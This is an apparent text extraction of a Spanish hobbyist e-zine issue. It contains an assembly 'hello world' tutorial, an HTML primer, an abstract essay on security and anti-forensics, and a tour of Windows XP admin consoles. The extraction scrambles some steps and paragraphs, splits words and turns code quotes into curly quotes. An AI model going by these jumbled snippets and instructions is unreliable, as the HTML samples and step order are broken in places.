INT 21H ;Ejecutamos la int … ----------------------------------Fin*1 -Nuestro primer programa en ASM: --Crear un programa que imprima en pantalla un clásico “HOLA MUNDO!” (También veremos el servicio 9 de la int 21h) Lo primero que haremos es crear el código fuente: -------------------------------HMundo.asm*1 .MODEL SMALL ; Determinamos el modelo de memoria .STACK ; Definimos el área de pila .DATA MENS DB "HOLA MUNDO!.$" ; Especificamos la cadena de texto a mostrar .CODE ; Inicio del código INI: ; Etiqueta de inicio MOV AX,@DATA ; Permite tener acceso a los datos MOV DS,AX ; a través de el registro DS MOV DX,OFFSET MENS ; Prepara para desplegar el mensaje MOV AH,9 ; Llama al servicio 9 INT 21H ; de la int 21h para desplegar el texto MOV AH,4CH ; Llama al servicio 4Ch INT 21H ; de la int 21h para terminar END INI ; Cierra la etiqueta de inicio -------------------------------Fin*1 Luego que ya tenemos el código fuente, debemos ensamblar el código (teniendo el programa ensamblador, claro esta), para esto entramos al intérprete de comandos:

Introducción al ASM

Luego usamos el TASM para ensamblar el código:

*Nota: si no se especifica, el codigo objeto (.obj) se guardara en la carpeta donde se encuentra el ensamblador. Si no hay ningún error, continuamos. Ahora debemos “linkear” el código objeto, esto lo hacemos con TLINK:

*Nota: al igual que TASM, si no se especifica, TLINK guarda el ejecutable el la carpeta donde se encuentre el ensamblador. Ahora, si no hay ningún error, solo resta probar el programa, esto lo podemos hacer mediante la misma consola, solo debemos escribir su nombre y oprimir ENTER:

Luego nos posicionamos en la carpeta donde se encuentran los archivos del ensamblador (en mi caso: “D:\TASM\BIN”)

Y listo. En la imagen se puede apreciar como aparece la cadena de texto “HOLA MUNDO!.” --Utilización del comando DEBUG de Windows para probar programas: Windows cuenta con una herramienta de edición y comprobación de programas, la cual podemos utilizar para probar programas antes de convertirlos en ejecutables, esta herramienta es el “debug”. Una “desventaja” de debug, es que a la hora de codificar el programa, no contamos con herramientas propias de un programa ensamblador, tales como la

CUH e-zine 2ª edicion
utilización de etiquetas, el uso de variables, etc. Todo lo debemos hacer mediante posiciones específicas de memoria. ---Comprobación del programa “HMUNDO” mediante debug: Probaremos el programa, que hicimos anteriormente en TASM, con el comando debug. ----Comandos del debug que usaremos para probar el programa: E ~ Enter ~ Introduce datos directamente en la posición de memoria especificada. ((Pe.: e 0f1e:0000 ‘Texto.$’)) este comando asigna la cadena de texto “Texto” en la posición de memoria 0f1e:0000 A ~ Assemble ~ Permite introducir el código de nuestro programa a partir de la dirección especificada. ((Pe.: a 1024)) este comando indica que el siguiente código se empezara a escribir desde el offset 1024 del actual segmento. G ~ Go sin parámetros, comprueba la porción de código que se a introducido en la memoria, o a la posición que se apunte. Q ~ Quit Salir de debug

Introducción al ASM

Luego mediante el comando “a” del debug, comenzamos a escribir el codigo del programa:

Ahora solo resta probarlo mediante el comando “g” del debug:

--Comprobación del programa: Abrimos el intérprete de comandos, y escribimos debug seguido de un ENTER

En la imagen se puede apreciar el mismo resultado obtenido mediante la creación del programa con TASM. Lo primero que hay que saber es que en el programa (HMUNDO) tenemos un cadena de texto que tiene que ser asignada a una posición de memoria, como ya no se cuenta con los recursos del ensamblador, debemos asignar esa cadena de texto directamente a la memoria, esto lo hacemos con la ayuda del comando “e” del debug: -Conclusión: Este tutorial solo pretende ser una introducción a la majestuosidad de este lenguaje. Es imposible explicar la potencia del asm en pocas páginas. *Nota: *1 se refiere a que dicha línea es solo parte de este tutorial, no se usa a la hora de programar. “Pe.:” se refiere a un ejemplo explicativo. Pe.: ~ Por ejemplo ~: Se refiere al significado o a una equivalencia.

by “The Shadow” el-hacker.com

CUH e-zine 2ª edicion

Arrancando Html

Arrancando HTML
</br> //Esto es un salto de línea

By Gallloo

Starting HTML

Formato de texto Una forma de modificarlo es mediante las etiquetas: <font></font> La etiqueta Font nos sirve para darle bastantes formatos a nuestro texto, sus atributos más usados son: • Color Nos sirve para asignarle un color, normalmente lo hacemos en hexadecimal. La pregunta más frecuente, ¿ qué es el HTML ? HTML es un lenguaje de programación web bastante sencillo y lo recomiendo para iniciarse en la programación. Es un lenguaje web estático, del lado del cliente , es decir , que lo interpreta nuestro navegador ya sea Firefox , IE, etc… Sintaxis El HTML está compuesto por etiquetas que se abren y cierran de este modo <b> Hola mundo </b> //T en negrita exto Se utiliza “<b>” para abrir y “</b>” para cerrar y delimitar la parte que queda sometida a esas etiquetas. Luego , los atributos de esas etiquetas se ponen al principio, en la apertura. <div align=”center”>T que quedará centrado</div> exto Como habéis visto, align es un atributo, sus valores son: left, center, justify y right Hay otras etiquetas que solo constan de una parte, pero son poco frecuentes, ejemplo: <Font color=”#00FFFF”>T con color</Font> exto • Face Con este atributo asignamos la fuente del texto contenido. <Font face=”Arial”>Hola mundo</Font> <div></div> Para un usuario avanzado esta etiqueta es de gran utilidad pero por ahora solo la usaremos para alinear el texto que ya lo he explicado anteriormente. <ul><li></li></ul> Con esto hacemos una lista con una determinada sangría. Estas etiquetas van “unidas de la mano” <ul> sirve para definir el bloque donde se va a usar <li> que designa un elemento de la lista. <ul> <li>Elemento1…</li> <li>Elemento2…</li> </ul> En esta parte podría profundizar más pero no me quiero extender mucho.

CUH e-zine 2ª edicion
<a></a> Estas etiquetas nos permiten hacer enlaces o hipervínculos hacia otras páginas. Con su atributo href especificamos la dirección hacia donde nos conducirá. <a href=”www .google.es”>Nombre para clickar</a> Imágenes •

Arrancando Html

<table></table> Mediante estas etiquetas especificamos que vamos a definir una tabla. • width & height Es exactamente igual que el de las imágenes. <table height=”200” width=”100”> <tr><td>eyyyyy</td></tr> </table> align Es el mismo atributo que el de los divs, y como ya sabéis sirve para alinear la tabla hacia donde queramos. <table align=”center” height=”200” width=”100”> <tr><td>eyyyyy</td></tr> </table> • border Indicamos el grosor del border de la table en pixels. <table border=”5”>…

<img /> Para mostrar una imagen en nuestra página web lo hacemos mediante la etiqueta <img />. Sus atributos son: • src Indicamos la ruta donde se encuentra la imagen que queremos mostrar. <img src=”imágenes/img1.jpg” /> • width & height Define la anchura y altura de tu imagen. Si no ponemos este atributo nos mostrará la imagen con sus medidas reales, pero si lo escribimos lo hará con las que habeis indicado. Las medidas las tomará en pixels. <img src=”img1.jpg” width=”100” height=”94” /> • border Especifica los pixels de borde que tendrá la imagen. Por defecto tiene el valor “1” , así que sino queremos que nos ponga bordes habrá que ponerlo a “0”.

bordercolor Definimos el color del borde de la tabla, como siempre en hexadecimal o con constantes, por ejemplo: red, black , #000000 , blue… <table bordercolor=”red”>…

bgcolor Indicamos el color que tendrá el fondo de la tabla, al igual que antes en hexadecimal o con constantes. <table bgcolor=”#000000”>…

Si quisiéramos alinear la imagen hacia algún lado lo haríamos con <div align=”….”></div> Al igual que hicimos con el texto. Tablas <table><tr><td></td></tr></table> Las tablas es algo un poco más avanzado en html, por lo que no os preocupéis si no lo entendéis a la primera. Tampoco profundizaré mucho ya que es un tema bastante extenso.

Bien, vamos ahora a los “más complicado”. Como todos bien sabéis las tablas se componen de columnas y filas, pues eso lo vamos a indicar con las etiquetas <tr></tr> y <td></td> . Las <td> siempre están subordinadas a <tr>, vamos a verlo. <tr></tr> Con estas etiquetas especificamos una fila de la tabla, para que sea una “fila verdadera” y podamos escribir dentro de ella, debe de llevar los <td></td> dentro que es la parte donde pondremos el contenido. Si queremos poner más filas lo haremos repitiendo el mismo proceso. Veamos sus atributos y de paso algunos ejemplos. • bgcolor Este indica el color de fondo de la fila , ya que es en el <tr>. <table align=”center”> <tr bgcolor=”red”> <td>Columna1, Fila1</td><td> Columna2, Fila1</td> </tr> <tr bgcolor=”blue”> <td>Columna1, Fila2</td><td> Columna2, Fila2</td>

CUH e-zine 2ª edicion
</tr> </table> <td></td> Como dije antes estas etiquetas van subordinadas a <tr>, es decir, que van dentro. Estas, indican las columnas que habrá. Su atributo más utilizado es bgcolor. Veamos algún ejemplo. <table align=”left”> <tr bgcolor=”red”> <td bgcolor=”red”><img src=”img1.jpg” /></td> </tr> <tr bgcolor=”blue”> <td>Columna1, Fila2</td><td> Columna2, Fila2</td> </tr> </table> Se podrían ir poniendo más filas y columnas, eso ya es a gusto de cada uno. Aún quedan varios atributos más pero son algo más avanzados y es cosa de que lo busquéis vosotros. Como colspan o rowspan ; ) . Para comprenderlo mejor deberíais estar practicando y ver como quedan. Formularios <form></form> Esta parte es la última y la más avanzada de este artículo. Los formularios se indican con las etiquetas <form></form> y dentro van las etiquetas de sus elementos, los cuales veremos ahora. Si no sabéis absolutamente de nada de PHP , no os van a servir para mucho, pero bueno. Veamos los únicos atributos que nos sirven sin PHP :P • action Con este indicamos al “lugar” o página donde se envían los datos. • method Puede tener solo dos valores, “get” o “post”. Lo voy a explicar aunque como no utilizaremos PHP no será necesario. -GET envía los datos mediante la URL y utilizando variables que son accesibles al usuario. -POST manda los datos “ocultamente” , o mejor dicho sin mostrarlo en la URL. <input /> Con este introduciremos los elementos en nuestro formulario, cuando digo elementos me refiero a textboxes, botones, checkbox … Solo explicaré los atributos necesarios. • type Indicamos el tipo de elemento a añadir. Ej: text , submit, button, password, checkbox, option… • size Definimos el tamaño de ese elemento. • value Es el valor que tendrá por defecto. Si lo ponemos en un text cuando abramos la

Arrancando Html

página nos aparecerá escrito eso en el text. Para los checkbox y radio es distinto. <textarea></textarea> Como su nombre indica es un text en tamaño gigante :D. Tiene varias líneas y lo que escribamos en medio de sus etiquetas equivale al value de los inputs. • cols Expresa el nº de columnas que tendrá el textarea. • rows Con el definimos el nº de filas. <form><textarea cols=”20” rows=”8”> texto dentro</textarea></form>

Colores basicos: nombre y hexadecimal
Bien veámos ahora un ejemplo global de todo lo que hemos hecho en el artículo <div align=”right”> <font color=”red”><b>Hola</b></font><br /> <img src=”imagen_1.png” width=”300” border=”3” /> </div><br /> <ul> <li>Elemento 1</li> <li>Imagen 1 <img src=”img1.jpg” border=”0” /></li> </ul><br /> <table border=”3” width=”500” height=”500”> <tr><td>1,1</td><td>1,2</td></tr> <tr bgcolor=”#000000”><td>2,1</td><td>2,2</td></tr> </table><br /> <div align="center”> <a href=”www .google.es”>Soy un enlace</a></div><br /> <form action=”mailto:correo@correo.com” method=”post”> <input type=”text” size=”9” v alue=”nombre” /><br /> <input type=”checkbox” /><br /> <input type=”password” size=”9” /><br /> <textarea cols=”20” rows=”6”>texto, ey</textarea> <input type=”submit” v alue=”Enviar” /> </form> Esto es todo, hasta la próxima edición de parte de gallloo ;- )

CUH e-zine 2ª edicion Html cheat sheet

Arrancando Html

CUH e-zine 2ª edicion

Seguridad informática

Seguridad informática

By Aleksteir

Como muchos saben la seguridad es un concepto que debe ir plenamente ligado a cualquier tipo de sistema informático, al desarrollar algún tipo de sistema de información, debemos tener siempre en cuenta, aquellos aspectos, en cuanto a la seguridad de los datos y del sistema mismo se refieren, por que siempre habrá alguien dispuesto a quebrantar o estará en constante búsqueda para encontrar la forma de vulnerar aquello en lo cual nosotros nos hemos esforzado en salvaguardar y que va implícito a el perfecto funcionamiento de el sistema como tal, y que si tenemos en cuenta también, que nosotros cobramos por eso o vivimos de ello, entonces nos veremos afectados a un grado profundo, pudiendo incluso poner en duda el concepto que los demás tengan de nuestros conocimientos, experiencias, y del buen nombre, que muchos tratamos de cuidar, al ejecutar o enfrentar cualquier tipo de desarrollo de un sistema informático; ante nuestros actuales clientes o ante los que potencialmente podrían estar interesados en nuestro trabajo, llevándonos de esta manera al fracaso intelectual y económico, dando paso, a una inminente desaparición de esa idea (o ilusión) que con tanto ahínco hemos enfrentado (incluso ondeándola como nuestra mayor bandera, si se trata del desarrollo de aplicaciones o programas) derrumbando hasta nuestra propia fe en ello. Sin embargo todo ello, es algo, que de por si, viene implícito al desarrollo de aplicaciones y de sistemas informáticos, ya que la experiencia ha demostrado que en cuanto informática ( Y en la vida misma, los hechos así lo demuestran) se refiere la inseguridad siempre existirá (nada es 100% seguro) y ese será en el futuro uno de los ítems que mas atención captará por parte de la comunidad desarrolladora de sistemas informáticos (incluso los no orientados a la seguridad) ; con esta introducción empezamos este temilla tan espinoso como es la seguridad informática y otro concepto relativamente nuevo como es la informática antiforense.

En internet existen sitios que publican vulnerabilidades y fallas que a diario se encuentran en aplicaciones y en sitios, por parte de personas que dedican su vida a ello, algunos lo hacen por obtener fama o dinero; y es algo que nos hace reflexionar y reconocer que la inseguridad es una fea e insistente compañera de viaje para todos aquellos que son responsables de la seguridad informática en todo tipo de empresas y organizaciones, bien sea en cuanto a desarrollo de aplicaciones o en cuanto a seguridad de los datos críticos, bien sea de entidades publicas o privadas, que dependen netamente de ellos (siendo incluso su mayor activo y por ende el tesoro que mas deben, y se esfuerzan por cuidar), es ahí donde nace la necesidad de crear sistemas que posean los mecanismos y maneras efectivas para intentar prevenir al máximo, las intrusiones y las formas de que alguien (ajeno a la administración y al manejo eficiente y seguro de dichos datos, e incluso en el peor de los casos, protegiendo dicha información, hasta de una posible amenaza interna, por parte de algún administrador o de alguien que tenga acceso físico a esas personas) pudiera llegar a vulnerar o a tumbar el sistema que para ello se haya tratado de implementar.

CUH e-zine 2ª edicion
Debemos también saber, que esta incesante guerra que se lleva cabo en contra de “el lado oscuro” no es algo nuevo, y es que la inseguridad misma quien arenga y excita constantemente a todos aquellos que de alguna manera trabajamos o dependemos al 100 % de la seguridad de sistemas informáticos, bien sea aplicada a proveedores, tanto como a usuarios. Es por eso que debemos tratar de descubrir e identificar todas esas interrelaciones (muchas veces ocultas) que tienen que ver con alguna falla o vulnerabilidad que tarde o temprano será la causa de algún tipo de incidente (en la mayoría de los casos: desastroso). Es por ello que debemos tener en cuenta varios elementos palpables y muy reales sobre la seguridad de la información, como concepto plenamente intangible, y que requiere de la inseguridad para tener un sentido como tal, asegurando que de esta forma se puedan desarrollar estrategias eficientes y prácticas que sean eficaces para aumentar al máximo posible los niveles de seguridad. Teniendo en cuentas los anteriores factores la seguridad total nunca será 100 % posible, ya que no existe ningún elemento que no esté expuesto a situaciones inesperadas e imprevistas, que alteren el correcto ejercicio del sistema, bien sea de manera positiva o negativa. En base a esto, es como se deben solventar políticas en cuanto a la administración de la seguridad, y para ello suele recurrirse a el análisis y administración de riesgos, el cual esta basado: en los procesos que reconocen la presencia de situaciones no previstas y que deben prever de esta forma, poder tomar medidas y controles, que mitiguen estas posibles situaciones. En la actualidad las prácticas de auditoría, encuentran en la seguridad de la información un ítem imprescindible, que ofrece a todos aquellos que tienen la responsabilidad de implementar la seguridad, una herramienta para enfrentar y contrarrestar la inseguridad propia de los componentes del sistema que gestiona dicha seguridad. Se hace por ello necesario que la gestión de seguridad de la información, sea constantemente revisada y complementada, no solamente para descubrir las posibles fallas de seguridad, sino también, para comprender de manera estructural y sistemática las posibles tensiones existentes entre los distintos elementos que la conforman. En este aspecto, las tendencias de la internacionalización y la realidad de un sistema de información global, hacen que la seguridad de la información se convierta en un elemento activo, estratégico y vital para la gran mayoría de las empresas modernas (y de las no tan nuevas también). Es aquí donde la inseguridad nos plantea retos interesantes, al tener que investigar todos los incidentes que se llegasen a presentar, y el responder a preguntas como: qué fue?, quién fue?,

Seguridad informática

porqué fue ?, dónde fue?, cuándo fue? y cómo fue?. Y a través de diferentes estrategias, metodologías, técnicas y evidencias, que nos ayuden a encontrar las respuestas a estos interrogantes; no obstante la terrible audacia y habilidad de los intrusos a veces puede llegar a desconcertarnos, al ver que de una u otra forma, intentan alterar o desafiar el funcionamiento de el sistema de seguridad implementado, haciendo mas difícil la tarea de indagación para resolver el caso en cuestión. Este hecho nos lleva a plantearnos, el hecho de que la inseguridad de la información, radica muchas veces en habilidades y practicas anti-forenses (digital anti-forensics), las cuales buscan manosear, enredar o destruir los rastros o evidencias relacionadas con el incidente en cuestión, con el fin confundir los hallazgos y los resultados de las investigaciones que para ello se adelanten. Entonces, tanto los investigadores, como los responsables de la seguridad, debemos asumir y confrontar, si las metodologías usadas, realmente son las mas adecuadas, llegando incluso a replantear nuestro propio concepto mismo de seguridad y por ende obligándonos también a reestructurar nuestros mapas mentales y de esta forma comprender las fallas que estamos cometiendo, convirtiéndose en el fondo, en características y consecuencias propias de un sistema, que en la mayoría de los casos pueden ser muchas mas, de las que en realidad podemos administrar. Esta es la idea principal de este artículo, donde se plantean dos conceptos paralelos, pero intrínsecamente ligados: seguridad informática e informática anti-forense, teniendo como lugar de origen y como radio de acción, la actualidad de las organizaciones y sus respectivos procesos, también debemos afrontar esas imprescindibles cuestiones: como nuevos retos; al tener que confrontar las distintas técnicas y tácticas de que se valen los “quebradores de sistemas”, y darle de esta manera un sentido mas enfático, mucho mas preciso, y mejor orientado o dirigido, especialmente a las estructuras y métodos, que aplicaremos a la seguridad de los sistemas informáticos, que tratemos de desarrollar.

La seguridad es un elemento subjetivo, es decir individual a cada sujeto. Cada uno de nosotros tiene una manera distinta de analizar y comprender la seguridad, también poseemos la facultad de analizar

CUH e-zine 2ª edicion
y por ende el concepto que se tiene de la seguridad depende de factores independientes. Por lo tanto es tan valedera, la definición que cualquier persona de a pie o del común pueda tener, como la de un especialista en cuestiones técnicas de seguridad, pues cada uno ve una realidad distinta, desde su propio punto de vista o análisis del sistema. Al contrario de ello, la seguridad informática es un elemento objetivo, ya que hace referencia al objeto, que en cualquier caso es una realidad evidente, sensible y verificable. Es en este aspecto, en que la inseguridad da valor a la esencia misma del análisis de riesgos, ya que solo, es por medio de acciones que comprueben y verifiquen dicha validez, donde obtendremos las medidas de los niveles de exposición a posibles riesgos, y así llegar a estructurar los controles, para poder tomar las decisiones acertadas, para minimizar, y en algunas veces hasta transferir las fallas; reduciendo el impacto que podrían llegar a causar.

Seguridad informática

Nunca existe un nivel superior relativo a la seguridad, ya que siempre es posible encontrar alguna medida mejor que la anterior, y todo ello es el fruto del análisis de las medidas de protección, que deben estar siendo constantemente evaluadas para así comprender, el por que: ¿de que forma no funciona el sistema?, partiendo de ello es posible replantear o implementar nuevas estrategias, que estén constantemente mejorando nuestro actual sistema de seguridad. Al contario, la inseguridad si tiene un máximo nivel, por ejemplo: en un seguro de vida, lo máximo en este caso es la muerte, y en cada caso se pacta en un valor definido por el comprador, definiendo de esta manera los ítems que rigen dicho seguro, es por ello que nace la necesidad de mantener un nivel de protección, ya que siempre debemos tratar de cuantificar el nivel de inseguridad que podemos administrar, siguiendo los niveles que se basan en las prácticas de seguridad y la dinámica de los procesos de un determinado tipo de negocio. Podríamos llegar a establecer un máximo nivel de exposición o riesgo que quisiéramos asegurar, con las normas y precauciones que el asegurador establezca como mínimas, para poder aprobar y pagar los perjuicios, como fruto de la materialización del riesgo, más allá de nuestro debido cuidado y diligencia para mantenerlo en los

niveles establecidos. La seguridad es impalpable, ya que no radica en los dispositivos de seguridad que se tomen, tampoco en los procedimientos efectuados, ni mucho menos en las personas o en los cargos o puestos que ellas ejercen. En si, la seguridad es la afirmación, de que estamos ante un activo cuyo manejo no es evidente, ni certero, debido a su volatibilidad, y se basa en la percepción externa que se pueda tener del mismo. Con solo detenernos a observar los mercados financieros, que dependen muchas veces de incertidumbres geopolíticas y que pueden llegar a destruir la sensación de seguridad de los inversionistas, conllevando a efectos devastadores en los movimientos monetarios y financieros. En contraposición a lo anterior pero complementario, podemos afirmar que la inseguridad es algo muy tangible, podemos detectar el robo, la estafa, los accidentes, las catástrofes, son propiedades evidenciables y demostrables, de manera que sabremos a ciencia cierta determinar la cantidad de los daños ocasionados, bien sea en cifras o en hechos. Podemos afirmar también que ello responde a una propiedad emergente de un sistema (propiedad que nace de la relación entre los elementos de un sistema y no en particular a un elemento que lo conforma). Es así, que la seguridad esta intrínsecamente relacionada con la tecnología, los procesos y los individuos, convirtiéndose en un todo coherente y ordenado que depende de el entendimiento o comprensión de las interrelaciones existentes, la mayoría de las veces invisibles, en cuanto a protección de activos se trata. Cabe añadir que la inseguridad es totalmente inherente a los objetos, una realidad que deber ser descubierta y analizada para ser enteramente entendida, llevándonos inevitablemente de esta manera, hacia la propia administración de los riesgos. Al tener plena conciencia de nuestra existencia, también asumimos que estamos expuestos a muchos riesgos, de ello se deduce que la inseguridad es inherente a nuestro diario vivir y por tanto, es preciso tomar una serias de medidas que nos permitan amortiguar los impactos causados.

CUH e-zine 2ª edicion
Cuando se trata de moldear o diseñar cualquier tipo de objeto o estructura, buscamos que ese algo tenga las características que perseguimos y que se adapten a las necesidades que tengamos. De igual forma cuando deseamos que los activos gocen de seguridad, debemos primero comprender los riesgos a los cuales está expuesto, para planificar las distintas estrategias de seguridad para el caso y así lograr un nivel inferior de exposición de dichos activos. La inseguridad como tal, no requiere de esquemas o diseños específicos, se sabe que todos los objetos en sí mismos la contienen y se puede manifestar indistintamente, de igual forma se materializará en el objeto que se examina, aseverándonos que la inseguridad es una propiedad inherente a los elementos y advirtiéndonos la manera de cómo establecer los mínimos ítems de seguridad para limitar la materialización de la misma en un escenario con distintos actores y variables.

Seguridad informática

En conclusión a todo lo planteado hasta acá, se hace latente en repensar la administración de la seguridad, por una administración de inseguridad, donde evidenciando cada una de las características de ésta última, podamos cambiar las prácticas actuales de seguridad informática, focalizada a objetos, para reconocer una nueva política basada en las relaciones que generan las perspectivas gerenciales, los procesos económicos y la actual infraestructura computacional, como una rica fuente que complementa el entendimiento y la comprensión de las vulnerabilidades en los sistemas. Informática anti- forense

La mente de algunos “inquietos” muchas veces llega a esferas de lo que el software o hardware puedan establecer. Estos personajes creativos y desafiantes ponen a prueba, la representación relativa y enfocada de los encargados de la seguridad. Se dice en la industria informática que estos “inquietos” tienen mucho tiempo al estar en su mayoría de las

veces “desocupados” y que no procuran soluciones o alternativas para la seguridad, sino que al contrario ocasionan mas daños y problemas de lo que se cree, recordando a cada uno de los protagonistas, que se deben reconocer que cada sistema de gestión, tiene una propiedad inherente que se llama inseguridad, de la cual no se puede prescindir, al contrario debe ser el objeto de un mayor análisis, para evidenciar y entender las posibles fallas..Esto no se logra de la noche a la mañana, por lo tanto debe recurrir a estrategias que puedan variar las rutinas del día a día para la gestión de la seguridad y de esta forma detectar eso que solo los llamados “inquietos” pueden ven, entonces se hace necesario poder administrar la variedad y conocer la complejidad relativa a la dinámica de la seguridad de cada entidad u organización, sin embargo tarde o temprano las organizaciones serán objeto de errores o incidentes de seguridad, que de acuerdo con las políticas de la empresa, desembocará en investigaciones y análisis para determinar y reconstruir los hechos, así también como identificar a los posibles responsables y los móviles que los impulsan. Es en estos casos donde la informática forense tiene su razón de ser, y también es allí donde la inseguridad materializada se evidencia y los hechos pueden ser de igual forma muy variados: exclusión de información, modificaciones de datos, inadecuadas prácticas de disposición de medios, entre otras. La computación forense permite a las organizaciones adelantar los exámenes requeridos por y con los medios tecnológicos, para valorar lo sucedido, y de manera técnica o científica, explicar lo que pudo suceder, siempre basado en hechos reales y en evidencia plenamente verificable. De ahí que las habilidades de los inquietos también prevé la forma de distorsionar la realidad para “conducir la investigación” hacia donde ellos lo han planificado y no hacia la verdad de lo acaecido. Este hecho profundiza en el cómo funcionan las herramientas forenses, sus alcances y limitaciones sobre las mismas, y de esta forma detallar alternativas que eviten posibles fallas y dudas sobre su adecuado funcionamiento y uso. Een este escenario es donde los investigadores forenses en informática entran en desventaja, pues cualquier hallazgo que se obtenga con dichas herramientas, bien sea computacionales o físicas, ya que serán refutadas como objeto de duda por parte de la defensa del acusado. Es por eso que la computación anti-forense es un reto constante para la seguridad de la información y su posterior desarrollo. Ya que al estudiar las pruebas y ataques que adelantan las mentes inquietas, se producen y establecen nuevas políticas y propuestas que permiten a los desarrolladores, afinar sus futuras aplicaciones y fortalecer sus aplicaciones vigentes. Se puede afirmar que la fortaleza de una herramienta forense, se mide en las constantes dudas y fallas que tiene que resolver para confrontar las observaciones y ataques llevado a cabo por las

CUH e-zine 2ª edicion
llamadas mentes inquietas. Y la computación anti-forense nos invita a “ver con otros ojos” lo que la realidad nos dice, enrutandonos y orientándonos en como debemos actuar, y sobra decir que es una compañera estratégica y fundamental que nos obliga a repensar la seguridad de la información, pero mal utilizada, es una amenaza permanente que nos exige estar alerta en todo momento para tratar de deducir y bloquear los movimientos de los intrusos. La informática anti-forense nos conlleva a proyectos como Metasploit Project http://www.metasploit.com igual forma también las revistas Phrack , insecurity magazine http://www.phrack.org y muchos mas http://www.insecuremag.com esfuerzos internacionales, que llevan como bandera: establecer un referente real y preciso sobre la seguridad de la información.

Seguridad informática

prevenir ataques y solventar e implementar mejores sistemas de seguridad informática, la vulnerabilidad en estos casos no es tomada como una debilidad o carencia de control, es simplemente se hace preciso reconocer que aun no hemos acabado de comprender la variedad que puede alcanzar el sistema que hemos creado, también se debe recalcar, que estas medidas deben ser continuas y flexibles, para poder entender y moldear el sistema y llevarlo a la toma de decisiones eficientes en cuanto a las posibles situaciones de fallo y no a una posición inflexible, que solo se rige a cierto tipo de incidente únicamente. En otras palabras se debe tener la mente abierta, ante el ramillete de posibilidades que se pudieran presentar, además de una insistencia constante, para así, poder enfrentar nuevas propuestas y estrategias creativas, que conlleven a mejorar la gestión de la seguridad informática. Ignorar o renunciar al aprendizaje de la inseguridad, es cortar el correcto flujo de la seguridad y por ende cercenar su futuro, de igual forma es negar la dinámica misma del desarrollo y las nuevas facetas para afrontar las nuevas formas de protección, que no pasan de ser el entendimiento mismo de la inseguridad materializadas, en una técnicas, una herramientas o el desarrollo de un sistema de información como tal.

Después de efectuar de un ejercicio de valoración de seguridad, ya sea por medio de ataques controlados o por la puesta a prueba de vulnerabilidades contra la infraestructura de las entidades y organizaciones (Publicas o privadas), siempre queda un mal sentir en el ambiente, ya que se contraponen, por un lado los esfuerzos y gestiones efectuados por el encargado de la seguridad, que ve como sus esfuerzos no son suficientes para contrarrestar los ataques o fallos y también ve como se refuerzan los mecanismos al ver que su sistema se doblegan ante la propia inseguridad del sistema. Por otro lado también queda un aire de satisfacción, por parte de los consultores, al haber descubierto las fallas y evidenciar las falencias en la aplicación de los procedimientos y acciones en cuanto al área de seguridad se refieren. Respecto a este contraste, nunca se debe tratar de esconder la primera y resaltar la segunda, seria un autoengaño hacerlo; es por eso que la mayoría de las organizaciones reconocen en las vulnerabilidades y en la mayoría de los casos también que recurren (Contratan) a aquellas mentes inquietas como una de sus fuentes de aprendizaje, ya que al estar de parte, de quienes por regla, tratan de romper los sistemas, logrando a corto y mediano plazo encontrar las formas de

By Aleksteir

CUH e-zine 2ª edicion

Herramientas Administrativas

Herramientas administrativas

By Aleksteir

En este articulo veremos la forma de usar varias herramientas administrativas, muy importantes para la correcta optimización del sistema, tal como son: Usar la herramienta restaurar el sistema, el administrador de tareas, y otras cositas mas, espero que les sirva de guía, para aquellos que recién empiezan a cacharrear con el windows, he de decir que la mayoría de las cosas aquí expuestas son aplicables preferiblemente a XP profesional. Primero que todo vamos a ver el administrador de tareas, esta herramienta esta compuesta por una Interfax grafica y consta de unas pestañas y de un menú, es muy fácil de usar, la primer pestaña es la de las aplicaciones que se encuentran trabajando en primer plano: Cuando tenemos un programa atrancado o que no responde, una magnifica opción , es escoger : Ir al proceso, esa opción nos manda a la siguiente pestaña, procesos:

Desde esta ventana podemos seleccionar una aplicación (click derecho) y nos saldrá una menú contextual que nos da varias opciones: Con esta opción podemos terminar un determinado proceso o una tarea en especifico, o establecer la

CUH e-zine 2ª edicion
prioridad de su uso, o terminar todo el árbol del proceso:

Herramientas Administrativas

La pestaña rendimiento en la paste posterior nos muestra un osciloscopio que indica los picos de uso del cpu y en la parte baja , muéstralas estadísticas y la información en cuanto al funcionamiento del procesador y del pc en general:

Pòr ultimo llegamos a la pestaña usuarios, desde allí podemos cerrar un sesión, y ver los demás usuarios que se encontrasen:

La pestaña Funciones de red, nos permite ver un osciloscopio en la parte superior, y desde el menú ver, podemos configurar la velocidad, los bytes enviados o escoger seleccionar las columnas que aparecen en la parte inferior de dicha funcionalidad:

Desde el administrador de tareas también podemos iniciar un nuevo proceso o aplicación, en fin es cuestión de familiriarizarse y de usarla constantemente Otra herramienta imprescindible es el administrador de equipos, desde esta consola administrativa teneos un ramillete de posibilidades que nos permitirán manejar y administrar correctamente todo

CUH e-zine 2ª edicion
el pc, para poder acceder al componente de la consola, vamos a menú inicio, ejecutar, allí escribimos: compmgmt.msc, nos aparecerá una ventana cono esta:

Herramientas Administrativas

También contamos con la consola de administración de dispositivos: desde allí nos fijamos si hay algún driver funcionando mal o que necesite de reinstalación, en fin su nombre es devmgmt.msc:

Allí tenemos una maravillosa opción que se llama administración de discos, desde la cual podemos manejar todos las unidades del PC ya sean lógicas primarias o extraíbles, podemos formatear, cambiar el nombre y administrarlas de una manera fácil y eficiente, el nombre de esta herramienta es diskmgmt.msc.

También podemos desfragmentar los disco duros desde la consola dfrg.msc :

Otra consola muy importante es Servicios, desde allí sabemos los servicios que tenemos activos, podemos saber la forma en que se inician, su nombre es services.msc: Existe otra consola que se llama lusrmgr.msc y allí nos parece como Usuarios Locales y Grupos:

Esta es solo una pequeña y superficial vista de la

CUH e-zine 2ª edicion
consola de administración de equipos Siguiendo con las herramientas imprescindibles para el eficiente mantenimiento y correcto funcionamiento del sistema, seguimos con una de las buenas, para recuperación de daros perdidos o para volver el PC en un estado anterior, ideal para revertís cambios críticos que se hacen pero que, bien sea por distintos motivos se quieren deshacer, la herramienta en cuestión se llama rstrui.exe o restaurar el sistema, dicha aplicación la encontramos en la carpeta de Windows en una subcarpeta llamada restore, desde allí podemos , restaurar el pc a una fecha en especifico, (se debe tener punto de restauración para poder restaurar), también podemos configurarla para que cree puntos automáticos o también podemos crear nuestro propios puntos de restauración, de igual forma podemos deshacer una restauración, en caso de obtener resultados indeseados, para acceder a la herramienta vamos al menú inicio todos los programas Accesorios Restaurar Sistema, nos Herramientas del sistema aparcera una pantalla como esta:

Herramientas Administrativas

Si escogemos la opción Crear punto de restauración:

Nos aparecerá una casilla donde introduciremos el nombre del punto de restauración, pro si vamos a efectuar cambios sustanciales o que serian críticos y tal vez quisiéramos deshacer dichos cambios.

